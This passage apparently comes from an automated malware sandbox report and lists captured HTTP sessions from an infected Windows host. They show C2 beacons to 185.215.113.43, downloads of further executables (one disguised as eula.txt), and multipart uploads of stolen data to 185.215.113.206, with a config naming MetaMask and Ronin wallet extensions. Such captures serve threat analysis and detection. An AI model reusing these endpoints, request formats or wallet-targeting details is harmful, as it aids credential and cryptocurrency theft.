Dec 13, 2024 18:54:27.252553940 CET	335	IN	HTTP/1.1 200 OK Date: Fri, 13 Dec 2024 17:54:27 GMT Server: Apache/2.4.41 (Ubuntu) Vary: Accept-Encoding Content-Length: 108 Keep-Alive: timeout=5, max=96 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 54 57 56 30 59 55 31 68 63 32 74 38 4d 48 78 33 5a 57 4a 6c 65 48 52 6c 62 6e 4e 70 62 32 35 41 62 57 56 30 59 57 31 68 63 32 73 75 61 57 39 38 55 6d 39 75 61 57 34 67 56 32 46 73 62 47 56 30 66 44 42 38 63 6d 39 75 61 57 34 74 64 32 46 73 62 47 56 30 51 47 46 34 61 57 56 70 62 6d 5a 70 62 6d 6c 30 65 53 35 6a 62 32 31 38 Data Ascii: TWV0YU1hc2t8MHx3ZWJleHRlbnNpb25AbWV0YW1hc2suaW98Um9uaW4gV2FsbGV0fDB8cm9uaW4td2FsbGV0QGF4aWVpbmZpbml0eS5jb218
Dec 13, 2024 18:54:27.356959105 CET	203	OUT	POST /c4becf79229cb002.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----EHJDGCBGDBKJKFHIECBA Host: 185.215.113.206 Content-Length: 7775 Connection: Keep-Alive Cache-Control: no-cache
Dec 13, 2024 18:54:27.357084036 CET	7775	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 45 48 4a 44 47 43 42 47 44 42 4b 4a 4b 46 48 49 45 43 42 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 31 65 39 64 39 30 Data Ascii: ------EHJDGCBGDBKJKFHIECBAContent-Disposition: form-data; name="token"1e9d90fc38a00362cb8233168e636e7984af8905635c1031ac8fd086280c21ba4189ba64------EHJDGCBGDBKJKFHIECBAContent-Disposition: form-data; name="file_name"c3lzdGVtX2luZ
Dec 13, 2024 18:54:28.323712111 CET	202	IN	HTTP/1.1 200 OK Date: Fri, 13 Dec 2024 17:54:27 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=95 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Dec 13, 2024 18:54:28.777275085 CET	94	OUT	GET /68b591d6548ec281/sqlite3.dll HTTP/1.1 Host: 185.215.113.206 Cache-Control: no-cache
Dec 13, 2024 18:54:29.222595930 CET	1236	IN	HTTP/1.1 200 OK Date: Fri, 13 Dec 2024 17:54:29 GMT Server: Apache/2.4.41 (Ubuntu) Last-Modified: Mon, 05 Sep 2022 11:30:30 GMT ETag: "10e436-5e7ec6832a180" Accept-Ranges: bytes Content-Length: 1106998 Content-Type: application/x-msdos-program Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 12 00 d7 dd 15 63 00 92 0e 00 bf 13 00 00 e0 00 06 21 0b 01 02 19 00 26 0b 00 00 16 0d 00 00 0a 00 00 00 14 00 00 00 10 00 00 00 40 0b 00 00 00 e0 61 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 30 0f 00 00 06 00 00 1c 3a 11 00 03 00 00 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 d0 0c 00 88 2a 00 00 00 00 0d 00 d0 0c 00 00 00 30 0d 00 a8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 0d 00 18 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 20 0d 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELc!&@a0: 0@< .text%&`P`.data\|'@(,@`.rdatapDpFT@`@.bss(`.edata,@0@.idata@0.CRT,@0.tls @0.rsrc0@0.reloc<@>@0B/48@@B/19R"@B/31]'`(@B/45-.@B/57\B@0B/70
Dec 13, 2024 18:54:29.222615004 CET	1236	IN	Data Raw: 00 00 23 03 00 00 00 d0 0e 00 00 04 00 00 00 4e 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 38 31 00 00 00 00 00 73 3a 00 00 00 e0 0e 00 00 3c 00 00 00 52 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 39 32 00 00 00 00 00 Data Ascii: #N@B/81s:<R@B/92P @B
Dec 13, 2024 18:54:29.226856947 CET	1236	IN	Data Raw: ec 0c 89 c5 85 db 74 05 83 fb 03 75 2e 89 7c 24 08 89 5c 24 04 89 34 24 e8 19 f7 0a 00 83 ec 0c 89 c5 89 7c 24 08 89 5c 24 04 89 34 24 e8 64 fd ff ff 83 ec 0c 85 c0 75 02 31 ed c7 05 48 67 eb 61 ff ff ff ff 83 c4 1c 89 e8 5b 5e 5f 5d c3 8d b4 26 Data Ascii: tu.\|$\$4$\|$\$4$du1Hga[^_]&+C\|$\$4$w#t\|$\$4$u#u\|$D$4$t&up\|$D$4$rZ\|$D$4$Q

Session ID	Source IP	Source Port	Destination IP	Destination Port
20	192.168.2.7	50025	45.155.249.199	80

Timestamp	Bytes transferred	Direction	Data
Dec 13, 2024 18:54:26.856628895 CET	61	OUT	GET /files/winrar/eula.txt HTTP/1.1 Host: 45.155.249.199
Dec 13, 2024 18:54:28.087668896 CET	1236	IN	HTTP/1.1 200 OK Date: Fri, 13 Dec 2024 17:54:27 GMT Server: Apache/2.4.58 (Ubuntu) Last-Modified: Thu, 12 Dec 2024 19:26:08 GMT ETag: "3600-62917afb02b04" Accept-Ranges: bytes Content-Length: 13824 Vary: Accept-Encoding Content-Type: text/plain Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 cd 13 62 da 89 72 0c 89 89 72 0c 89 89 72 0c 89 75 52 1e 89 88 72 0c 89 07 6d 1f 89 ca 72 0c 89 52 69 63 68 89 72 0c 89 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 e4 51 e5 5b 00 00 00 00 00 00 00 00 e0 00 0e 21 0b 01 05 0c 00 1e 00 00 00 14 00 00 00 00 00 00 00 10 00 00 00 10 00 00 00 30 00 00 00 00 00 10 00 10 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 60 00 00 00 04 00 00 00 00 00 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 80 31 00 00 43 00 00 00 38 30 00 00 28 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$brrruRrmrRichrPELQ[!0`1C80(Pt08.text `.rdata0"@@.data@$@.relocP4@B
Dec 13, 2024 18:54:28.087735891 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 55 8b ec e9 05 00 00 00 c9 c2 0c 00 55 8b ec 81 c4 54 f2 ff ff 81 3d b0 4a 00 10 78 6f 72 64 75 38 81 3d b4 4a 00 Data Ascii: UUT=Jxordu8=Jatau,hPhJjhh@lrPhhGhGPkX@jjjhG{hGPDlhhGYhGP"f
Dec 13, 2024 18:54:28.087749004 CET	1236	IN	Data Raw: 00 00 8b 45 f8 8b 10 50 8b 42 70 ff d0 6a 00 8d 85 fc fb ff ff 50 8b 45 f8 8b 08 50 8b 41 78 ff d0 ff 75 10 8b 45 f8 8b 08 8b 91 80 00 00 00 50 ff d2 68 80 b5 5c d6 8b 45 f8 8b 08 8b 91 a8 00 00 00 50 ff d2 8d 85 f4 fb ff ff 50 8d 85 f0 fb ff ff Data Ascii: EPBpjPEPAxuEPh\EPPPEPA(j0PffP3f}tf@ffdffff0ff
Dec 13, 2024 18:54:28.088017941 CET	1236	IN	Data Raw: 10 50 e8 62 11 00 00 ff d0 c7 85 24 fe ff ff 00 00 00 00 8d 85 24 fe ff ff 50 68 7e 66 04 80 ff 75 e8 68 99 47 00 10 e8 69 10 00 00 68 bd 47 00 10 50 e8 32 11 00 00 ff d0 85 c0 75 67 6a 00 6a 0a 8d 85 28 fe ff ff 50 6a 00 ff 75 e8 e8 d7 0e 00 00 Data Ascii: Pb$$Ph~fuhGihGP2ugjj(Pju4Pj(PjjhG%hGPu"' NEu]jEPj(hJjEPj(hJujEPujEPj(hJj
Dec 13, 2024 18:54:28.088047981 CET	1236	IN	Data Raw: d8 83 7d d4 00 74 40 33 c0 66 8b 47 02 2b 45 d4 6a 00 ff 75 d4 8d 44 38 04 50 ff b5 b4 fc ff ff 68 99 47 00 10 e8 97 0b 00 00 68 b8 47 00 10 50 e8 60 0c 00 00 ff d0 85 c0 0f 8e 5a 05 00 00 29 45 d4 e9 9a 00 00 00 6a 00 6a 04 57 ff b5 b4 fc ff ff Data Ascii: }t@3fG+EjuD8PhGhGP`Z)EjjWhGehGP.'jWj(hJ<ft?3f_jSGPhGhGPf;Gt!+]3_t}f
Dec 13, 2024 18:54:28.088064909 CET	1236	IN	Data Raw: 00 00 50 e8 3f f3 ff ff e9 b3 00 00 00 80 3f 00 0f 85 91 00 00 00 6a 04 68 00 10 00 00 68 00 00 01 00 6a 00 e8 25 09 00 00 8b f0 68 80 01 00 00 56 57 e8 5a 06 00 00 8b 8d 90 f9 ff ff 8d 95 b4 fc ff ff 8d 85 94 f9 ff ff 89 86 80 01 00 00 89 9e 84 Data Ascii: P??jhhj%hVWZjjjhGvhGP?jjVhIjj3fGjPGPw%Ku3
Dec 13, 2024 18:54:28.088077068 CET	1236	IN	Data Raw: ff 45 0c ff 75 0c ff 75 10 ff 75 08 e8 ac 01 00 00 e9 92 00 00 00 8d 35 b0 4a 00 10 8d 3d 00 40 00 10 8b 4d 0c 83 7d 0c 00 75 0b ff 75 08 e8 fa 00 00 00 8d 48 01 bb 00 03 00 00 ac 39 7d 08 77 57 83 7d 10 00 74 0e 8b 55 10 88 02 8a 07 30 02 ff 45 Data Ascii: Euuu5J=@M}uuH9}wW}tU0E0I}u}uft}tfzu.}u}u?t}t:uGtKu5JaUSWV}3}tG}tGEEEE^_[USWVu8
Dec 13, 2024 18:54:28.088640928 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Dec 13, 2024 18:54:28.088690042 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: DNS1:5.132.191.104
Dec 13, 2024 18:54:28.088701963 CET	1236	IN	Data Raw: a2 ce 11 b1 1f 00 aa 00 53 05 03 20 d5 8b 14 ab a2 ce 11 b1 1f 00 aa 00 53 05 03 0b 01 00 00 00 00 00 00 c0 00 00 00 00 00 00 46 4d 69 63 72 6f 73 6f 66 74 20 49 6e 74 65 72 6e 65 74 20 45 78 70 6c 6f 72 65 72 00 6e 74 64 6c 6c 2e 64 6c 6c 00 4c Data Ascii: S SFMicrosoft Internet Explorerntdll.dllLdrLoadDllwininet.dllInternetCrackUrlAInternetOpenAInternetConnectAHttpOpenRequestAInternetSetOptionAHttpSendRequestAHttpQueryInfoAInternetReadFileole32
Dec 13, 2024 18:54:28.207773924 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
21	192.168.2.7	50026	34.107.221.82	80	7540	C:\Program Files\Mozilla Firefox\firefox.exe

Timestamp	Bytes transferred	Direction	Data
Dec 13, 2024 18:54:26.944082975 CET	303	OUT	GET /canonical.html HTTP/1.1 Host: detectportal.firefox.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cache-Control: no-cache Pragma: no-cache Connection: keep-alive
Dec 13, 2024 18:54:28.036226034 CET	298	IN	HTTP/1.1 200 OK Server: nginx Content-Length: 90 Via: 1.1 google Date: Fri, 13 Dec 2024 10:13:43 GMT Age: 27644 Content-Type: text/html Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600 Data Raw: 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 75 72 6c 3d 68 74 74 70 73 3a 2f 2f 73 75 70 70 6f 72 74 2e 6d 6f 7a 69 6c 6c 61 2e 6f 72 67 2f 6b 62 2f 63 61 70 74 69 76 65 2d 70 6f 72 74 61 6c 22 2f 3e Data Ascii: <meta http-equiv="refresh" content="0;url=https://support.mozilla.org/kb/captive-portal"/>
Dec 13, 2024 18:54:38.203545094 CET	6	OUT	Data Raw: 00 Data Ascii:
Dec 13, 2024 18:54:48.406616926 CET	6	OUT	Data Raw: 00 Data Ascii:
Dec 13, 2024 18:54:58.582751036 CET	6	OUT	Data Raw: 00 Data Ascii:

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
22	192.168.2.7	50029	185.215.113.43	80	8028	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 13, 2024 18:54:27.994314909 CET	184	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 31 Cache-Control: no-cache Data Raw: 64 31 3d 31 30 31 34 38 38 34 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1014884001&unit=246122658369
Dec 13, 2024 18:54:29.343707085 CET	193	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 13 Dec 2024 17:54:29 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 34 0d 0a 20 3c 63 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 4 <c>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
23	192.168.2.7	50035	31.41.244.11	80	8028	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 13, 2024 18:54:29.493773937 CET	62	OUT	GET /files/burpin1/random.exe HTTP/1.1 Host: 31.41.244.11
Dec 13, 2024 18:54:30.822446108 CET	1236	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 13 Dec 2024 17:54:30 GMT Content-Type: application/octet-stream Content-Length: 4438776 Last-Modified: Tue, 10 Dec 2024 00:01:52 GMT Connection: keep-alive ETag: "675784f0-43baf8" Accept-Ranges: bytes Data Raw: 4d 5a 60 00 01 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 52 65 71 75 69 72 65 20 57 69 6e 64 6f 77 73 0d 0a 24 50 45 00 00 4c 01 04 00 ce 3f c3 4f 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 08 00 00 90 01 00 00 96 00 00 00 00 00 00 5f 94 01 00 00 10 00 00 00 a0 01 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 80 02 00 00 02 00 00 e7 a4 44 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 84 c9 01 00 c8 00 00 00 00 30 02 00 10 4f 00 00 00 00 00 00 00 00 00 00 10 7b 43 00 e8 3f 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a0 01 00 6c 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED] Data Ascii: MZ`@`!L!Require Windows$PEL?O_@D0O{C?l.text `.rdata;<@@.dataM@.rsrcO0P@@U`AS3;VWtf9bAt`APPPYnj'@uv=A6PP9^]v8^3hAPPPxAEE;FrP~Y6jtAt$DV%sAF8^jqA39`At@9D$tt$Ph5XAA3D$`\|$u@3pAt$D$t$`A/@t$PQ%`A3T$L$fAABBfuL$3f9t@f<Aut$TAL$%S\$VC;^tLW3
Dec 13, 2024 18:54:30.822491884 CET	1236	IN	Data Raw: c9 6a 02 5a 8b c3 f7 e2 0f 90 c1 f7 d9 0b c8 51 e8 94 80 01 00 8b f8 33 c0 39 46 08 59 7e 1d 39 46 04 7e 10 8b 0e 66 8b 0c 41 66 89 0c 47 40 3b 46 04 7c f0 ff 36 e8 68 80 01 00 59 8b 46 04 89 3e 66 83 24 47 00 89 5e 08 5f 5e 5b c2 04 00 56 8b f1 Data Ascii: jZQ39FY~9F~fAfG@;F\|6hYF>f$G^_^[Vv\IY^oUQQAuVjjEP5A\|At>E;Ew6rE;Es,jPYYtlAj@ AEPjh5XAA3D$tlA
Dec 13, 2024 18:54:30.822505951 CET	1236	IN	Data Raw: 3b f3 74 06 8b 06 56 ff 50 08 33 c0 40 eb 25 e8 a7 fe ff ff 8d 4d e0 8b f8 e8 bb 0e 01 00 8b 06 56 ff 50 08 8b c7 eb 0c 3b f3 74 06 8b 06 56 ff 50 08 33 c0 5e 5f 5b c9 c3 56 8b f1 c7 46 04 60 c3 41 00 83 66 08 00 c7 06 34 a5 41 00 c7 46 04 24 a5 Data Ascii: ;tVP3@%MVP;tVP3^_[VF`Af4AF$AfNf$N(^Uh$AuYYtEP#UPQ3hAudYYu@]Vv({F$YtPQvzvYtVP^l$
Dec 13, 2024 18:54:30.822729111 CET	1236	IN	Data Raw: 7d c4 0f 84 d0 02 00 00 66 83 7d c4 08 0f 85 c5 02 00 00 ff 75 cc 8d 4d f0 e8 76 f8 ff ff 8d 45 f0 50 8d 46 10 50 8d 45 e4 50 8d 5e 28 e8 1f fc ff ff 83 c4 0c 50 8b cb e8 90 f8 ff ff ff 75 e4 e8 b6 76 01 00 39 7d 14 59 0f 85 6f 02 00 00 8b 46 0c Data Ascii: }f}uMvEPFPEP^(Puv9}YoFURjuf}f}PQ;EtMu{v}Y^f9}u~@-f}t jeVPMXuFvY,EF@FURjuPQ;Eu3f9}URjuF<F
Dec 13, 2024 18:54:30.822741985 CET	896	IN	Data Raw: a2 41 00 8b f8 3b fe 74 33 56 6a 01 6a 01 57 ff 15 a4 a2 41 00 56 56 56 8d 45 e4 50 ff 15 a8 a2 41 00 8d 45 e4 50 ff 15 ac a2 41 00 6a 01 57 ff 15 b0 a2 41 00 57 ff 15 b4 a2 41 00 5f 5e c9 c3 53 ff 74 24 08 ff 15 94 a2 41 00 8b d8 85 db 75 02 5b Data Ascii: A;t3VjjWAVVVEPAEPAjWAWA_^St$Au[VW\|$Wt$A5AWSWS_3^@[UDSVWjpA5XAAPuuSuhuuSt&utWS\AWS`AtPdAz=Auo5h
Dec 13, 2024 18:54:30.822957993 CET	1236	IN	Data Raw: 50 ff 51 0c 39 75 fc 74 3f ff 75 fc e8 d4 fd ff ff 59 8d 4d d8 51 6a 18 50 89 45 fc ff 15 40 a0 41 00 6a 06 ff 75 e0 ff 75 dc 56 56 56 ff 75 08 ff 15 84 a2 41 00 ff 75 fc 56 68 72 01 00 00 ff 75 08 ff 15 b8 a2 41 00 8b 45 f0 8b 08 50 ff 51 08 33 Data Ascii: PQ9ut?uYMQjPE@AjuuVVVuAuVhruAEPQ3@WPA3_^[f=AuD<AfAAfft@Af=uDAA;ufAAUSV339AtAM9tFA9u9
Dec 13, 2024 18:54:30.822968960 CET	224	IN	Data Raw: 5b c2 04 00 8b 01 8b 51 04 8b 4c 24 08 2b d1 8d 54 12 02 8d 0c 48 52 51 8b 4c 24 0c 8d 04 48 50 ff 15 3c a2 41 00 83 c4 0c c2 08 00 53 56 57 eb 3b 8b 02 8b 39 8a 1c 07 8a c3 e8 db f5 ff ff 84 c0 75 27 80 fb 3b 75 2d 3b fe 7d 12 8b 01 8b 32 80 3c Data Ascii: [QL$+THRQL$HP<ASVW;9u';u-;}2<0t@;B\|2_^[Ar91\|S\$VWu33\|$Gt$P$AtF;w\|3_^[t3GVt$W39~~(Ft$P$A
Dec 13, 2024 18:54:30.823107958 CET	1236	IN	Data Raw: 00 85 c0 75 0b 8b 06 6a 01 57 8b ce ff 50 04 4f 47 3b 7e 08 7c d8 5f 5e c3 56 8b f1 ff 76 0c e8 cf 68 01 00 ff 36 e8 c8 68 01 00 59 59 5e c3 ff 74 24 0c ff 74 24 0c ff 74 24 0c e8 59 ff ff ff 83 c4 0c 85 c0 74 04 8b 40 0c c3 33 c0 c3 55 8b ec 83 Data Ascii: ujWPOG;~\|_^Vvh6hYY^t$t$t$Yt@3U@}u3AE@uEEP At7M3;w.rE;Es$j+pPkYYtAA3@t$Yujht$jAt$jYu%8AV
Dec 13, 2024 18:54:30.823120117 CET	1236	IN	Data Raw: ff 75 08 53 ff 75 10 ff 15 18 a1 41 00 8b 0e 88 1c 08 89 46 04 5f 8b c6 5e 5b 5d c3 55 8b ec 83 ec 0c 8d 4d f4 e8 76 e6 ff ff 83 7d fc 01 7f 0a 6a 01 8d 4d f4 e8 32 e3 ff ff 56 8b 35 14 a1 41 00 57 8b 7d 08 8b 07 6a 01 ff 75 f4 50 ff d6 85 c0 75 Data Ascii: uSuAF_^[]UMv}jM2V5AW}juPuucY7S@PPMPSuVf$FYEEPdVcY[_^U cSVW}3SSSSWPEu50AXuEE3]]]}MQ
Dec 13, 2024 18:54:30.823133945 CET	1236	IN	Data Raw: 15 04 a1 41 00 5e c3 33 c0 5e c3 56 e8 ac fe ff ff 59 5e c3 53 8b 5c 24 0c 8b 03 83 63 04 00 66 83 20 00 56 8b 74 24 0c 57 6a 02 5f eb 08 66 3d 20 00 77 0a 03 f7 0f b7 06 66 85 c0 75 f0 66 83 3e 2c 75 0f eb 0b 66 85 c0 74 4d 66 3d 2c 00 74 47 03 Data Ascii: A^3^VY^S\$cf Vt$Wj_f= wfuf>,uftMf=,tGf={u0{t+uFf8}tF"Ff8{uPfu_^[L$Vj\%L$j/;~^VW\|$t$A~!FPPPt$
Dec 13, 2024 18:54:30.942318916 CET	1236	IN	Data Raw: 99 01 00 00 8b 45 e0 8b 1d 30 a2 41 00 46 83 65 e4 00 89 75 fc c6 00 00 eb 7c 3b 77 04 0f 8d a8 01 00 00 8b 07 8a 0c 30 46 80 f9 22 88 4d ec 89 75 fc 0f 84 ad 00 00 00 80 f9 5c 75 39 8a 04 30 46 3c 22 88 45 f0 89 75 fc 74 27 3a c1 74 1f 3c 6e 74 Data Ascii: E0AFeu\|;w0F"Mu\u90F<"Eut':t<nt<tMtj\ujjj\j"uMjhAPujhAPu#"t'\u\|0"uF0FPMu^0u<tFuhEPEP

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
24	192.168.2.7	50042	185.215.113.43	80	8028	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 13, 2024 18:54:41.241276026 CET	184	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 31 Cache-Control: no-cache Data Raw: 64 31 3d 31 30 31 34 38 38 35 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1014885001&unit=246122658369
Dec 13, 2024 18:54:42.570327044 CET	193	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 13 Dec 2024 17:54:42 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 34 0d 0a 20 3c 63 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 4 <c>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
25	192.168.2.7	50043	185.215.113.206	80	6008	C:\Users\user\AppData\Local\Temp\1014883001\9f2ded7baa.exe

Timestamp	Bytes transferred	Direction	Data
Dec 13, 2024 18:54:42.089356899 CET	565	OUT	POST /c4becf79229cb002.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----GCGIDGCGIEGDGDGDGHJK Host: 185.215.113.206 Content-Length: 363 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 47 43 47 49 44 47 43 47 49 45 47 44 47 44 47 44 47 48 4a 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 31 65 39 64 39 30 66 63 33 38 61 30 30 33 36 32 63 62 38 32 33 33 31 36 38 65 36 33 36 65 37 39 38 34 61 66 38 39 30 35 36 33 35 63 31 30 33 31 61 63 38 66 64 30 38 36 32 38 30 63 32 31 62 61 34 31 38 39 62 61 36 34 0d 0a 2d 2d 2d 2d 2d 2d 47 43 47 49 44 47 43 47 49 45 47 44 47 44 47 44 47 48 4a 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 32 31 71 62 47 78 74 65 57 31 73 59 6e 70 78 4c 6e 42 33 5a 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 47 43 47 49 44 47 43 47 49 45 47 44 47 44 47 44 47 48 4a 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d [TRUNCATED] Data Ascii: ------GCGIDGCGIEGDGDGDGHJKContent-Disposition: form-data; name="token"1e9d90fc38a00362cb8233168e636e7984af8905635c1031ac8fd086280c21ba4189ba64------GCGIDGCGIEGDGDGDGHJKContent-Disposition: form-data; name="file_name"c21qbGxteW1sYnpxLnB3ZA==------GCGIDGCGIEGDGDGDGHJKContent-Disposition: form-data; name="file"------GCGIDGCGIEGDGDGDGHJK--
Dec 13, 2024 18:54:43.906826973 CET	203	IN	HTTP/1.1 200 OK Date: Fri, 13 Dec 2024 17:54:43 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
26	192.168.2.7	50045	185.215.113.43	80	8028	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 13, 2024 18:54:45.285378933 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Dec 13, 2024 18:54:46.599922895 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 13 Dec 2024 17:54:46 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

